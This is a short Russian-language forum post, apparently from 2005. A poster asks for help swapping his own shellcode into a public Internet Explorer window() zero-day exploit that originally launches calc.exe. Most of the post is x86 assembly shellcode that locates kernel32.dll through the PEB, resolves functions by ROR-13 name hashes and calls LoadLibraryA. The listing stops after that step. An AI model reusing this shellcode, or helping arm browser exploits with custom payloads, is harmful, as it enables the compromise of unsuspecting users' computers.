Le@rner
Сообщений: 3
Оценки: 0
Присоединился: 2005-11-17 16:55:36
|
Господа, вот пытаюсь слегка отредактировать эксплоит IE windоw() URL: http://www.frsirt.com/exploits/20051121.IEwindоw0day.php
Ихний шелл-код запускает calc.exe :) У меня есть другой шел-код который я хочу запихнуть в эксплоит. Знаю точно что он рабочий так как пробовал откомпилированый исходник на асме - работает.
Вот АСМ код: [BITS 32]
global _start _start:
call LKernel32Base
LGetProcAddress: push ebx push ebp push esi push edi mov ebp, [esp + 24] mov eax, [ebp + 0x3c] mov edx, [ebp + eax + 120] add edx, ebp mov ecx, [edx + 24] mov ebx, [edx + 32] add ebx, ebp
LFnlp: jecxz LNtfnd dec ecx mov esi, [ebx + ecx * 4] add esi, ebp xor edi, edi cld
LHshlp: xor eax, eax lodsb cmp al, ah je LFnd ror edi, 13 add edi, eax jmp short LHshlp
LFnd: cmp edi, [esp + 20] jnz LFnlp mov ebx, [edx + 36] add ebx, ebp mov cx, [ebx + 2 * ecx] mov ebx, [edx + 28] add ebx, ebp mov eax, [ebx + 4 * ecx] add eax, ebp jmp short LDone
LNtfnd: xor eax, eax
LDone: pop edi pop esi pop ebp pop ebx ret 8
LKernel32Base: pop esi push byte 0x30 pop ecx mov ebx, [fs:ecx] mov ebx, [ebx + 0x0c] mov ebx, [ebx + 0x1c] mov ebx, [ebx] mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base push 0xec0e4e8e ; LoadLibraryA call esi ; GetProcAddress(kerne32.dll, LoadLibrary) mov edi, eax ; ebx = kernel32.dll base ; esi = LGetProcAddress ; edi = LoadLibraryA
Подскажите, пожалуйста, что нужно подредактировать С ассемблером знаком очень поверхносно.
|